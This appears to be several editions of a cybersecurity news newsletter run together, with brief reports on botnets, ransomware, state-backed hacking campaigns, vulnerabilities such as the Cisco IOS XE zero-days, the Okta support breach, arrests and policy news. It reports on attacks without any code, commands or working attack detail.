StripedFly: A malware botnet named StripedFly is suspected to have infected more than one million Windows and Linux PCs since it first began operating in early 2017. The botnet uses the leaked NSA exploit EternalBlue to spread and comes with modules for performing network reconnaissance, harvesting credentials, and mining cryptocurrency. Security firm Kaspersky says the botnet uses a custom version of the EternalBlue exploit that was compiled before the original exploit was leaked online in April 2017. Researchers have not attributed the botnet to any particular threat actor, but infosec reporter Kim Zetter points out that a Chinese espionage group named BuckEye had been seen using the EternalBlue exploit a year before it was leaked.
Huge crypto-mining botnet: Russian security firm Positive Technologies has discovered a crypto-mining operation that has infected more than 250,000 Windows PCs. Most of the infected systems are located in Russia and other Soviet states. The reason for the large number of infected users in the region is because the botnet's operators used Russian torrent sites to spread apps infected with their malware.
ScamClub landing pages: Confiant researchers have published an analysis of landing pages used by the ScamClub group. The company worked with industry partners last month to take down some of the group's infrastructure.
BlackDream ransomware: Security researchers have spotted a new ransomware family named BlackDream being used in attacks across Southeast Asia.
Rhysida ransomware: Avast researchers have published an analysis of the Rhysida ransomware, first spotted in the wild earlier this year in May.
BbyStealer returns: Symantec is seeing new campaigns leveraging the BbyStealer malware.
"The threat actors behind it have been leveraging multiple phishing websites advertising free download of Windows installers for various Virtual Private Network (VPN) applications."
DuckTail: Cluster25 looks at the DuckTail malware and its most recent campaign targeting Italian-speaking users via LinkedIn.
Craxs RAT: CyFirma has published a report on Craxs, a RAT developed by a developer based out of Syria. The latest RAT update adds a dropper component to make it easier to deploy additional payloads/malware strains.
Sponsor Demo
Listen to Resourcely CEO Travis McPeak talk with Risky Business Snake Oilers host Patrick Gray about the company's automagic Terraform cloud-provisioning technology.
APTs and cyber-espionage
Russian spying: Russian security firm Kaspersky says it discovered a Go-based backdoor that was used over the past few months to steal sensitive data from Russian government and industrial organizations. The company has not attributed the campaign to any APT group, but the operation seems to have been focused on intelligence collection.
APT28: France's cybersecurity agency, the ANSSI, has published a report reviewing APT28's latest operation techniques, dating back to 2021. The report is only available in French. An English version is likely to be published in the next weeks.
Winter Vivern: The Winter Vivern APT group has used a zero-day vulnerability to breach Roundcube webmail servers belonging to European government entities. The attacks were discovered by security firm ESET in early October, and a patch was released last week. The zero-day (CVE-2023-5631) is a stored XSS that allows the group to steal an account's emails. Prior to developing its own zero-day, ESET says the same group used older bugs to hack Roundcube and Zimbra email servers earlier this year in a different campaign. The exact same bugs were also exploited by a Russian cyber-espionage group named APT28, but ESET says Winter Vivern is a different group that may have possible ties to Belarus.
Operation Triangulation, part III: Kaspersky has published part three of its Operation Triangulation report. Parts one and two are here. They cover the TriangleDB malware and its modules. Part three covers the iOS exploit used to deliver the malware on targeted devices.
AridViper: Sekoia researchers have looked at the activities and internal structure of AridViper, the Hamas-linked APT group operating out of Palestine. Sekoia says the group was still active.
"AridViper seems to be organised in two subgroups, one conducting cyber espionage activities towards Israel and any entities in the Middle-East region susceptible to be involved in Palestine affairs, the second focusing on surveillance activitiestowards Palestinian Hamas opposition including the Fatah rival movement or individuals linked to the Palestinian Authority."
Yellow Liderc's IMAPLoader: PwC's security team looks at IMAPLoader, a new .NET malware strain employed by the Yellow Liderc Iranian APT group. The malware is named IMAPLoader because it is controlled via email messages and used to deploy additional payloads. PwC says IMAPLoader is deployed with the help of malicious JavaScript installed on watering hole sites where victims are selected based on their interests in the maritime, shipping, and logistics sectors.
Vulnerabilities, security research, and bug bounty
Google VRP expands to AI: Google has expanded its vulnerability research program to cover generative AI technologies. Named VRP for AI, the program will cover scenarios like prompt attacks, training data extraction, model manipulation, adversarial perturbations, and data model extractions. Microsoft also expanded its bug bounty program to cover AI earlier this month.
Tor Browser security audit: The Tor Project has published the results of a recent security audit of the Tor Browser and several other adjacent systems.
CISA KEV ransomware section: Nucleus Security's Patrick Garrity looks at how the new "ransomware" section in CISA KEV will impact vulnerability management and patching operations.
"Small" Windows zero-day: ACROS Security has discovered a zero-day vulnerability in Windows that can allow threat actors to prevent the OS from applying the Mark-of-the-Web on malicious documents. ACROS says that despite their finding, they "haven't found a realistic attack scenario" where the zero-day could be exploited in practice.
F5 BIG-IP RCE: Praetorian researchers have discovered a pre-auth RCE vulnerability (CVE-2023-46747) in the F5 BIG-IP load balancer. F5 has published security updates and a mitigation script, to be applied as needed. The bug has a severity rating of 9.8/10.
Grammarly vulnerability: Researchers at Salt Security have discovered a vulnerability in the OAuth implementations of Grammarly, Vidio, and Bukalapak that can be leveraged to hijack user accounts.
JS crypto vulnerabilities: Security researcher Zemnmez has found weak hashing algorithms being used in two JavaScript cryptography libraries.
Cisco IOS XE PoC: Security firm Horizon3 has published what it describes as a theoretical PoC exploit for two recent Cisco IOS XE zero-days (CVE-2023-20198 and CVE-2023-2073).
Apple security updates: Apple has released security updates for iOS. No zero-days this time. Phew!!!
iLeakage attack: A team of academics has developed a side-channel attack named iLeakage that targets Apple devices. The attack can be used to lure users to malicious web pages and then recover data from their Safari browser, such as passwords and the content of other tabs. Researchers say the attack is practical in the real world and works against Apple devices with A and M-series CPUs. The team notified Apple of the iLeakage attack in September 2022, but the company has not released any fixes.
Infosec industry
Market news: Defense company RTX is selling its cybersecurity division to private equity firm Blackstone for $1.3 billion. [Additional coverage in DefenseNews]
SOC burnout: According to a Tines survey of 900 security professionals, roughly 63% say they are experiencing some level of burnout after most saw workloads increase over the past year. Most blamed burnout problems on their SOC teams being understaffed. Even if 99% are satisfied with their job, more than half are considering switching jobs in the next 12 months for either better pay or lighter workloads.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss "spooky effects," aka when agencies play silly buggers with target computers.
This newsletter is brought to you by Resourcely, the company that can help you manage Terraform securely. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Password management service 1Password has joined the list of companies that have been impacted by a recent security breach at identity provider Okta.
1Password becomes the third company known to be affected by the Okta breach—after BeyondTrust and Cloudflare.
The Okta incident is the second major hack the company disclosed after a January 2022 incident when 366 companies had their Okta environments accessed.
This time around, we don't have a headcount for the hack just yet, but the incident is starting to look just as bad.
From public statements made by Okta, BeyondTrust, Cloudflare, and 1Password, the hack seems to have taken place somewhere at the end of September.
Okta says a threat actor used "stolen credentials" to access the account of one of its tech support engineers.
The hacker then used this account to look at tech support requests filed by Okta customers, most of which are major companies that use Okta's identity services to manage user logins into sensitive environments.
These tech support requests typically don't contain that much sensitive information, except when Okta asks customers to capture their browser traffic in the form of an HTTP Archive (HAR) file and upload it to their support case.
Okta says that some of these files contained copies of a company's Okta admin account session cookie, which the attacker extracted from the HAR and used to access customers' Okta management instance.
Luckily for Okta, some companies like BeyondTrust and 1Password spotted the attackers trying to log into their environments with the stolen session cookies. It's unclear how BeyondTrust spotted the intrusion, but 1Password said they spotted the attacker when it generated a report that compiled a list of all 1Password Okta admins, something that none of their staff requested.
So far, the three companies say they spotted the intruder in their Okta instance in early phases of reconnaissance, and none have seen the attacker pivot to internal systems.
Despite the happy ending for the three companies, all have put out statements that were extremely annoyed with Okta's slow response to the breach.
BeyondTrust says it notified Okta on October 2, but it took the company 16 days to investigate and publicly acknowledge the breach; time that several security experts claim could have helped other Okta customers carry out their own investigations at the time of the breach rather than two weeks later.
Breaches, hacks, and security incidents
AlfaBank hack: The Ukrainian Security Service has collaborated with two pro-Ukrainian hacking groups to breach Alfa Bank, one of Russia's largest banks. The hack took place last week and involved members of the KibOrg and NLB hacking groups. The two groups claim to have stolen data for 30 million Alfa Bank customers and have leaked some of the stolen files. The bank denied getting breached in a statement released to Russian media. Ukrainian security officials did not elaborate on the role they played in the hack. [Additional coverage in The Record]
University of Michigan breach: The University of Michigan has disclosed a security breach after hackers broke into its internal servers at the end of August. The organization says it detected the incident but not before the intruder accessed information on employees, students, alumni, donors, and contractors. The University of Michigan is one of the oldest and largest universities in the US, ranked 11th by 2022's enrollment numbers.
Gardai leak: Thousands of Irish drivers have had their driver's license information leaked online after the Irish Gardai left a server exposed on the internet. The server leaked PII data, but also leaked details of insurance investigations, vehicle registration certificates, notices of car seizures, and payment card details. The leak was traced at one of the agency's IT suppliers. [Additional coverage in the Irish Independent]
DDoS attacks on Israel:Cloudflare says it spotted DDoS attacks against Israel's rocket warning alerting system as fast as 12 minutes after Hamas launched missiles at Israeli cities on October 7, the day of their attack.
Hope Lend crypto-heist: A threat actor has stolen more than $825,000 worth of crypto-assets from the Hope Lend DeFi platform. The incident is surrounded by controversy because several security firms claim that a white hat managed to beat the attacker to the exploit and is actually now in control of the funds. On the other hand, the Hope Lend developer claims the attacker paid half of the stolen funds as a bribe to a transaction validator to process the malicious transaction and that the money is now gone. [Additional coverage in Cointelegraph]
General tech and privacy
Map apps in Israel: Apple and Google have disabled their live traffic data in their map apps in Israel at the request of the Tel Aviv government. [Additional coverage in Engadget]
Chrome to get IP protection feature: Google is working on adding a feature to its Chrome browser that will hide a user's IP address behind a network of proxies. Named IP Protection, the feature is currently being tested in Chrome Canary builds. In its initial phase, the feature will use a one-hop proxy, but Google says it is aiming for a two-hop proxy system that will be harder to deanonymize. [Additional coverage in BleepingComputer]
Firefox 119: Mozilla has released Firefox 119. New features and security fixes are included. The biggest change in this release is the ability to edit PDFs.
Government, politics, and policy
Global Encryption Coalition: A global coalition of tech companies, academics, and privacy and cybersecurity experts have published an open letter asking governments across the world to stop trying to backdoor end-to-end encryption.
Security cameras across the Netherlands: Dutch officials are worried about the large number of wrongly adjusted security cameras across the country. More than 315,000 security cameras are installed across the Netherlands, and more than 55,000 belong to private individuals. The cameras are only allowed to film the owner's property, but officials say they often record public roads and other citizens' private property, in violation of GDPR. [Additional coverage in Security.nl]
Australia to get a cyber shield: Microsoft has signed an agreement with the Australian government to build a cyber shield and help the country fend off cyber-attacks. The project's official name will be the Microsoft-Australian Signals Directorate Cyber Shield, or MACS. It is a classic threat-exchange program aimed at improving the detection of threats targeting Australia. Besides MACS, Microsoft will also invest AUS$5 billion to build nine more data centers in the country, raising the total to 29.
FTC ransomware report: The US FTC has published a report on cybercrime and ransomware-related reports the agency has received over the past years. Nothing particularly interesting in this one. The FBI IC3 report provides a far better view—in our opinion—of the cyber threat landscape.
TSA security updates: The US Transportation Security Administration (TSA) announced updates to three directives regulating cybersecurity for passenger and freight railroad carriers.
CYBER.ORG donation: CISA has donated $6.8 million in funding to CYBER.ORG, a non-profit that promotes cybersecurity education in K-12 schools.
"The funding will be used to empower educators and caregivers with resources and training needed to deliver cybersecurity content to students. CYBER.ORG currently has more than 30,000 teachers across all 50 states and four US territories enrolled in its content platform, reaching millions of students nationwide."
Spamouflage in Canada: The Canadian government says that a Chinese disinformation campaign named Spamouflage is targeting lawmakers and public institutions. The operation began in early August 2023 and continued through September and rellied on Facebook and Twitter bot networks. The accounts posted content accusing Canadian politicians of criminal and ethical violations and tried to silence CCP critics. Some of the posts also used deepfaked videos.
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Resourcely CEO Travis McPeak about the modern DevOps ecosystem, how giving developers tools with security baked in keeps everyone safe and happy, and how that's easier than expecting your software engineers to become cybersecurity experts overnight.
Cybercrime and threat intel
Spain arrests: Spain's National Police has dismantled a cybercrime group that made more than €3 million from online scams conducted via smishing, phishing, and vishing. Officials say the group impersonated delivery firms and electricity suppliers but also engaged in a scam known as the "son in distress." The group also stole and sold the personal data of four million people. Thirty-four suspects were detained last week across five Spanish cities.
Sachkov appeal: A Moscow court has rejected an appeal filed by former Group-IB CEO Ilya Sachkov to have his prison sentence repealed. Sachkov was sentenced in July to 14 years in a maximum security prison for high treason. Russian officials said Sachkov shared information of Russian citizens with foreign law enforcement agencies. It is believed information shared by Sachkov helped US authorities identify several Russian hackers and APT members. [Additional coverage in Interfax]
Hunters International: DataBreaches.net has an analysis of recent attacks carried out by an extortion group named Hunters International, which the site believes might be a rebrand of the Hive ransomware group.
Facebook malvertising: G Data analyzes a malvertising campaign that used Facebook ads to target users with malware.
Record ransomware numbers: The month of September 2023 has been the most active month for ransomware gangs on record, with 514 disclosed attacks. September 2023 beats the previous record of 459 ransomware attacks disclosed earlier this year in March. Two groups that launched last month, LostTrust and RansomedVC, ranked in the top five of most active groups. The numbers were compiled by NCC Group using data published on ransomware leak sites.
Scammers pounce on Israel-Hamas conflict: The FBI, the IRS, the FTC, and the UK government are warning citizens to be on the lookout when donating money to Israeli or Palestinian charity organizations. The agencies warn that scammers have already set up fake organizations to collect funds from individuals looking to donate to either cause. The FBI has seen fake charity schemes advertised on social media and via encrypted messaging apps. The agency says it also received complaints of legitimate Israeli email accounts being hacked and used to solicit donations.
Crypto money laundering: More than $7 billion worth of crypto-assets have been laundered through cross-chain services, with $2.7 billion laundered over the past year alone. Blockchain security firm Elliptic says cross-chain crime is rising at a faster rate than predicted. The company previously estimated that cross-chain crime would reach $6.5 billion by the end of the year and $10.5 billion by 2025. More than $2 billion worth of crypto was stolen from cross-chain services this year alone, according to rival blockchain tracking service Chainalysis.
Malware technical reports
Play ransomware: Antiy researchers have published an analysis of the Play ransomware.
Mallox ransomware: Chinese security firm Tinder Security Labs has looked at attacks against MS-SQL databases with the Mallox ransomware.
Cactus ransomware: SecurityScorecard's Vlad Pasca has a technical breakdown of the Cactus ransomware, first spotted back in March 2023.
Crypto-mining botnet: Kaspersky has a breakdown of a crypto-mining botnet targeting Windows systems. Besides the crypto-mining feature, the malware used in this attack also comes with backdoor and keylogging functionality. The botnet has been active since May this year and has infected around 200 users.
Cobalt Strike: Embee has threeblogposts on analyzing Cobalt Strike payloads.
GoPIX: Russian security firm Kaspersky has spotted a new banking trojan that targets the Brazilian financial sector. Named GoPIX, the malware has been active since December 2022 and targets users of the PIX money transfer system.
Grandoreiro: Proofpoint has discovered new versions of the Grandoreiro banking trojan that targets financial institutions outside Brazil. The new version has been seen targeting the users of Mexican and Spanish banks. This marks a rare instance where malware designed for Brazil's unique financial sector targets banks in the EU.
XWorm: Poland's CERT team has reverse-engineered XWorm, a popular remote access trojan.
Origin Logger: OALABS analyzes Origin Logger, a new .NET stealer and a possible clone/successor for the old and extremely popular Agent Tesla malware.
Riddle: ThreatMon looks at Riddle, a new infostealer advertised on the hacking underground, with possible ties to a Russian developer.
Sponsor Demo
Listen to Resourcely CEO Travis McPeak talk with Risky Business Snake Oilers host Patrick Gray about the company's automagic Terraform cloud-provisioning technology.
APTs and cyber-espionage
Operation Triangulation: Kaspersky researchers have published a second analysis of TriangleDB, the iOS spyware implant that was deployed part of Operation Triangulation. The operation targeted Russian government officials, foreign diplomats working in Russia, and Kaspersky employees. Russia's FSB intelligence service linked the attack to the NSA and claimed Apple cooperated with the American spy agency. The first report focused on the implant itself. The second focuses on two pre-infection components that attackers used to triage victims and four TriangleDB modules. These modules allow attackers to track the victim via GPS location data, record through the microphone as long as the battery has more than a 10% charge, and steal the device's keychain and SQLite files that store a phone's passwords and configuration data.
Vulnerabilities, security research, and bug bounty
Zcash security audit: NCC Group has conducted a security audit of the Zcash FROST protocol.
Single App Mode escape: WithSecure researchers have published details about an escape of Single App Mode, a feature that locks an iOS device to run a single application. This has no fix from Apple since the company does not consider it a vulnerability.
Orthanc vulnerability: Shielder researchers have published an analysis of CVE-2023-33466, a vulnerability in Orthanc, an open-source software to manage, exchange, and visualize medical imaging data.
"A quick lookup on Shodan (by searching for the authentication realm "Orthanc Secure Area") returned ~1700 exposed instances. We have developed a quick script to check for (probable) presence of the vulnerability here.
At the time of writing, ~20 hosts are publicly exposed with default credentials and with the arbitrary overwrite endpoint unrestricted. We urge every administrator that is using Orthanc in their systems to change the default/weak credentials and upgrade the software."
CitrixBleed: Assetnote researchers have published an analysis of CVE-2023-4966, a vulnerability in Citrix ADC and NetScaler devices that was patched on October 10. According to Mandiant, the vulnerability was exploited in the wild since the end of August. Assetnote named the vulnerability CitrixBleed because it can leak session tokens from Citrix devices and bypass authentication.
Cisco IOS XE update: The threat actor behind the attacks on Cisco IOS XE devices has added a protection mechanism (an HTTP authorization header) to the malware it planted on hacked devices. The protection mechanism has prevented some security firms from tracking the number of infected devices, but after tweaks to their scanners, it appears that ~38,000 devices are still infected. A tool to detect the new implant configuration is available here.
Infosec industry
HITB2023HKT videos: Talks from the Hack In The Box 2023 Phuket security conference, which took place back in late August, are available on YouTube.
Truesec layoffs: Cybersecurity firm Truesec has laid off some of its cybersecurity experts. Numbers are unclear so far. Still in the early reporting phase [1, 2].
Patch Tuesday anniversary: Microsoft's monthly Patch Tuesday security updates turned 20 this month, with the program having launched in October 2003.
Pwn2Own Toronto: The mobile and IoT edition of the Pwn2Own hacking contest is taking place in Toronto, Canada. See the schedule and live results.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss "spooky effects," aka when agencies play silly buggers with target computers.
This newsletter is brought to you by Resourcely, the company that can help you manage Terraform securely. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Over the past three days—since our last newsletter edition—the situation around the latest zero-day attacks targeting Cisco IOS XE devices has drastically changed, and we feel the need to cover it in our featured section and provide a short summary of what has been going on.
Although these attacks have been taking place since at least September 28, news of this campaign came out last Monday, on October 16, when Cisco revealed the existence of a zero-day tracked as CVE-2023-20198 in the web administration panel of its IOS XE operating system.
The zero-day allowed threat actors to create an admin account with the highest level of privileges on devices that had their WebUI panel exposed on the internet.
The investigation that continued throughout last week revealed the presence of a second zero-day that the attackers to use the admin account they created to inject commands into the IOS XE filesystem that would execute with root privileges.
Cisco said the exploit chain was being used to inject a Lua-based backdoor on devices across the world.
The company initially thought the second zero-day was a 2021 fixed bug tracked as CVE-2021-1435, but in a surprising update on late Friday, Cisco said the attackers were actually using a new zero-day altogether, which they are now tracking as CVE-2023-20273.
Nevertheless, Cisco and CISA both confirmed that CVE-2021-1435 was also being exploited in the wild but in a different campaign and by another threat actor.
But that's not the only thing that happened over the past weekend. The most interesting thing is that the Lua backdoor that was placed on all the hacked Cisco IOS XE devices since late September started disappearing.
Estimates from Censys and Shadowserver put the number of hacked devices at around 42,000 IOS XE routers and switches. That number remained steady until this weekend when it suddenly dropped to around 500-1,000.
Several theories exist as to what happened, ranging from law enforcement intervention (FBI doing its thing again) to a white-hat cleaning infected systems and even Cisco itself cleaning customer devices.
However, it is very likely that this action was performed by the threat actor itself. The Lua backdoor was not a particularly strong persistence system, since it could be removed with a device reboot, and its public visibility was attracting too much attention to the attacker's operations.
As several security researchers have pointed out, the removal of the Lua backdoor may have also been accompanied by instructions that may have compromised devices in other ways and in the long run—similar to how Chinese hackers evaded Barracuda patches earlier this year and entrenched themselves so deep in the compromised appliances that Barracuda ended up telling customers to replace their gear to be safe.
In the meantime, Cisco delivered on a promise it made on Friday and released patches for both zero-days on Sunday.
Applying the latest patches will not be a one-and-done operation for your IT teams. It will be just the beginning of a sprawling security audit of what happened on that device over the last month.
As for who is behind this campaign, nobody in infosec has yet even tried to make an attribution.
The groups that are interested in Cisco IOS XE gear include almost everyone, from hacktivists to APTs and from initial access brokers to proxy botnet operators.
Attribution would require looking at artifacts from a Cisco IOS XE device, and the people who have looked at that kind of stuff are still staying silent.
If there's one good thing to take away from this, it's that Cisco's own security teams discovered both zero-day while investigating a customer support ticket—unlike similar equipment vendors that either don't look or don't have security teams.
Unfortunately, the bad thing is that they discovered this zero-day exploit chain about the same time they discovered another zero-day—CVE-2023-20109. This suggests there's one or more threat actors specifically looking for bugs in Cisco IOS XE devices, and they appear to have been extremely successful.
Breaches, hacks, and security incidents
Okta breach: A threat actor has compromised the account of an Okta support staffer and accessed the data of some of the company's customers. The attacker had access to Okta's support network for more than two weeks, from October 2 to October 18. Okta says the intruder only stole HTTP archive files that the company requires customers to upload to their customer support portal for debugging purposes. Okta says it notified all customers whose data was accessed in the breach. Public victims known so far include Cloudflare and BeyondTrust, which first detected the breach and was the one that notified Okta.
Philippines security breach: A hacker claims to have gained access to multiple Filipino government websites and downloaded gigabytes of data. Named DiabloX Phantom, the hacker claims to have gained access to the sites due to weak admin passwords, such as "Admin123." He claims to be 19 years old and a former red-teamer who just wants to highlight the government's weak security practices. Known victims of his hacking spree include the websites for the Philippines House of Representatives, the national police's forensics database, the Philippine Statistics Authority, and the country's national health insurance corporation. The hacker released sample data as proof of his intrusions. [Additional coverage in SCMP]
Philadelphia email breach: Officials with the City of Philadelphia are investigating a potential security breach of the city's email server that may have taken place in late May. [Additional coverage in the Philadelphia Inquirer]
BGRS cyberattack: The Lockbit ransomware gang has hit the network of Brookfield Global Relocation Services, a company that helps the Canadian military move troops, materials, and facilities around the world. The company's website has been offline since late September for more than three weeks. The company told the Canadian government that the attackers gained access to the personal data of government personnel. [Additional coverage in CBC]
DCBOE hack: The District of Columbia Board of Elections has updated its data breach disclosure to confirm that hackers gained access to the District's entire voter roll information. The agency confirmed the breach after a hacker started selling the agency's data on an underground hacking forum.
ICC hack: The International Criminal Court says the security breach it suffered at the end of September was "a targeted and sophisticated attack with the objective of espionage." The organization did not reveal which state actor was behind the incident.
Jabber.ru MitM: The administrators of the Jabber.ru instant messaging service have discovered a Man-in-the-Middle attack that was intercepting encrypted TLS traffic going through its German servers. Admins say the active interception lasted for three months between July 18 and October 18 and was discovered when one of the attackers' certificates expired. Because the attack required cooperation from web hosting providers Hetzner and Linode, the Jabber.ru team believes the interception may have been a law enforcement operation.
"All jabber.ru and xmpp.ru communications between these dates should be assumed compromised. Given the nature of the interception, the attacker have been able to execute any action as if it is executed from the authorized account, without knowing the account password. This means that the attacker could download account's roster, lifetime unencrypted server-side message history, send new messages or alter them in real time."
Potential Meta breach: A threat actor is claiming to sell access to Meta's law enforcement portal, where agents file legal requests for the company's services. Unconfirmed for now.
Image via Alon Gal
General tech and privacy
Clearview AI overturns ICO fine: American facial recognition company Clearview AI has won a court case against the UK's privacy watchdog and has overturned a £7.5 million fine the ICO imposed on the company in May 2022. Clearview made the case that it only sells its services to foreign governments and their law enforcement agencies. The court sided with the company, which argued the ICO does not have jurisdiction over the affairs of foreign governments. Personal note: This is quite an interesting decision since the original fine was for illegally collecting of UK citizens, not to whom Clearview sold it. The British court system still remains a mystery to us, mere mortals. [Additional coverage in the BBC]
Google Falcon: Google Cloud has announced Falcon, a new low-latency hardware-assisted transport layer designed to speed up Ethernet connections in data centers.
Microsoft Security Copilot: Microsoft Security Copilot is now in early access. This is a GPT4-like assistant to help security professionals with incident response investigations and other security tasks.
Discord moderation: Discord has changed its terms of service and will now give out warnings instead of permanent bans. If users break the rules too often, they'll have access cut off to some core Discord features, such as sending DMs, posting images, and more. [Additional coverage in Forbes]
Twitch opens up: Twitch is finally going to allow streamers to broadcast on multiple platforms at once. The move comes after the company has lost major streamers to new platforms, all of which allow concomitant multi-platform streaming. [Additional coverage in The Verge]
Twitter disinformation continues: A study has found that Twitter verified blue check users pushed 74% of the most viral dis/misinformation surrounding the Israel-Hamas conflict over the past week. [Additional coverage in AdWeek]
Government, politics, and policy
EU chat control legislation: The EU postponed the vote on its chat control legislation for the second time last week.
AD security guide: France's cybersecurity agency ANSSI has published a guide on securing Active Directory (AD) networks. The guide is only available in French for now.
StopRansomware guide: US cybersecurity agencies have published an update on their StopRansomware guide. The new update comes with new prevention tips for hardening SMB protocols, revised response steps, and added threat-hunting insights.
Crypto-mixers to be desginated money laundering tools: The US Treasury Department's Financial Crimes Enforcement Network (FinCEN) has proposed rules that would designate cryptocurrency-mixing services as money laundering tools. The new rules would allow US authorities to impose sanctions and seize funds more easily. Officials cited the use of such tools by groups like Hamas and North Korea.
US GOP drama: Rep. Andrew Garbarino (R-NY) told Cyberscoop that the lack of an elected House speaker is delaying US lawmakers from advancing crucial cybersecurity legislation.
TSA cybersecurity lagging behind: A DHS OIG report [PDF] has found that high-value asset systems operated by the Transportation Security Administration have serious cybersecurity deficiencies. [Additional coverage in Federal News Network]
Facial recognition coming to Login.gov: The US government is adding facial recognition technology to its Login.gov single sign-on service. The new tech is scheduled to roll out next year. Users who don't want their face scanned to access government services will have a second digital identity verification option available, but the government hasn't decided what it will be yet. [Additional coverage in NextGov]
Philippines Army warns against AI use: Philippine officials have ordered defense and military personnel to refrain from using AI tools due to security risks. The US Space Force imposed a similar ban earlier this month. [Additional coverage in the Associated Press]
Philippines Cyber Command: The Philippine government is recruiting cyber personnel for its own Cyber Command-like structure inside its military forces. [Additional coverage in The Diplomat]
Brazil's New Resistance group: The US State Department has published a report on Nova Resistência, a Brazilian quasi-paramilitary neo-fascist organization formed by a pro-Kremlin disinformation and propaganda network.
"In addition to Nova Resistência's overt propaganda and disinformation in support of Russia's war against Ukraine, the organization has been involved in efforts to mobilize Brazilians to fight on the side of Russia and its proxies in the Donbas region of eastern Ukraine."
Russia formally linked to African online disinformation: A WaPo article describes how an employee at an Israeli online influence company Percepto International infiltrated pro-Russian Facebook groups, became very active, and was invited to a meeting at the Russian embassy in Burkina Faso to establish a partnership and receive further training and help promote anti-West views across the region. It's an eye-opening story on how Russia uses its diplomatic missions as part of its online disinformation efforts. Five countries in Africa's Sahel region were toppled in Russian-supported coups. [Additional coverage in the Washington Post/non-paywall]
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Resourcely CEO Travis McPeak about the modern DevOps ecosystem, how giving developers tools with security baked in keeps everyone safe and happy, and how that's easier than expecting your software engineers to become cybersecurity experts overnight.
Cybercrime and threat intel
RagnarLocker arrest: Europol officials have arrested a key member of the RagnarLocker ransomware group who was living in Paris, France. The arrest was announced after the gang's dark web leak site went offline last week. Five other suspects were interviewed in Spain and Latvia, and authorities seized servers in the Netherlands, Ukraine, Germany, and Sweden.
Ransomware suspects set free: A French judge has freed two Spanish nationals who have been accused of launching ransomware attacks against 26 French companies. Aged 26 and 28, the two suspects were detained in July of last year. French officials claimed the two used the Babuk ransomware to launch more than 200 attacks against companies all over the world. In a court hearing last week, lawyers for the two suspects argued there was reasonable doubt the two were behind the attacks. [Additional coverage in El Mundo/ h/t PogoWasRight]
Warning for plastic surgery patients: Cybercriminals are targeting plastic surgery offices and hospitals to steal data and extort patients. The FBI says the attacks use phishing and social engineering to gain access to target networks, from where attackers harvest data from electronic health systems. The stolen data is then used to send threats to victims via email, social media, or messaging apps.
Ducktail+DarkGate campaign:WithSecure says it's seeing the Ducktail Vietnamese cybercrime group employ the latest DarkGate Malware-as-a-Service to help its operations.
QNAP takes down brute-forcer: Taiwanese electronics vendor QNAP says it took down a server that was being used by a threat actor to launch brute-force attacks against its NAS devices, looking for accounts protected with weak passwords. The attack took place on October 14, and QNAP says it blocked it within seven hours via its NAS firewall feature. It also worked with Digital Ocean to have the attacker's server shut down.
New npm malware: Ten malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
Mastodon abuse: Stanford's Internet Observatory analyzes Mastodon's moderation model and how it could be abused for online propaganda.
New RDGA technique: Infoblox looks at RDGA (Registered Domain Generation Algorithm), an evolution of the classic DGA. So far, Infoblox has seen a Chinese APT using this technique.
"The main difference between this traditional use of a DGA and an RDGA is right there in the name: they're registered. With a standard DGA, the algorithm is incorporated in the malware itself and only a small percentage of the domains created by the algorithm are actually registered. [...] An RDGA, on the other hand, is used by the actor2 to create domains that will all be registered."
ENISA Threat Landscape: The EU's cybersecurity agency has published its yearly threat landscape report. Some main conclusions include the significant rise of social engineering attacks, infostealers became the biggest malware threat, classic mobile malware declined, and law enforcement operations increased.
Data breach statistics: The number of publicly disclosed data breaches will reach an all-time high this year, with the numbers for Q3 2022 already passing the previous record. More than 2,100 data breaches have been disclosed this year, way above the 1,862 peak recorded in 2021. According to researchers from the ID Theft Center, the record year can be attributed to the MOVEit hack, with 1,300 data breaches filed this year being related to the incident.
Malware technical reports
Dark Angels ransomware: SentinelOne analyzes the new Dark Angels ransomware, first spotted in September 2023. The security firm says the ransomware uses the leaked Babuk ransomware code for attacks on Windows systems and an ESXi encrypter that resembles the one used by the RagnarLocker group. The group operates a dark web leak site known as Dunghill Leaks.
"ESXi lockers continue to prove successful for the ransomware groups who use them, yet the overall pool of unique Linux ransomware families remains narrow. We assess with high confidence that these two samples are related and that the Linux version of Dark Angels is a very lightly modified, more recent version of the analyzed RagnarLocker binary.
Given the lack of security software on ESXi hypervisors, consider enhanced network monitoring for unusual access to these systems, including internal system traffic. When possible, focus on large or abnormal data transfers off of the ESXi server as well as other file storage services within the network."
7777-Botnet targets C-level execs: A botnet of more than 16,000 infected IoT devices has been launching slow-paced brute-forcing attacks against Microsoft Azure infrastructure. The attacks exclusively target the accounts of C-level executives. Each account is only targeted with two or three brute-force attempts per week and always from a different IP address. Named the 7777-Botnet, security researchers believe the attacker is trying to avoid detection by carrying out attacks at an extremely slow pace. Victims identified so far include two companies from the US energy sector, a UK government contractor, a UK university, and several companies in France.
WatchDog: Anity researchers have published a breakdown of the WatchDog crypto-mining botnet.
IcedID: Walmart's security team looks at a recent IcedID campaign leveraging GitLab.
QuasarRAT: Uptycs researchers have published a report on the QuasarRAT and its DLL side-loading techniques, designed to drop, deploy, and execute malicious payloads without raising suspicions.
LummaStealer: VMware's Carbon Black security team looks at the LummaStealer Malware-as-a-Service (MaaS).
ExelaStealer: Fortinet researchers have analyzed ExelaStealer, a new infostealer that is currently being sold on underground dark web hacking forums.
Sponsor Demo
Listen to Resourcely CEO Travis McPeak talk with Risky Business Snake Oilers host Patrick Gray about the company's automagic Terraform cloud-provisioning technology.
APTs and cyber-espionage
CrimsonRAT: Security researchers have published an analysis of CrimsonRAT, a malware strain used by Pakistani cyber-espionage group APT36.
Vulnerabilities, security research, and bug bounty
ListServ vulnerabilities: Security firm Praetorian has identified several vulnerabilities in mailing list management app ListServ. The vulnerabilities can be used to compromise admin accounts and achieve remote code execution. All bugs remain unpatched after the vendor did not reply to Praetorian's vulnerability disclosure.
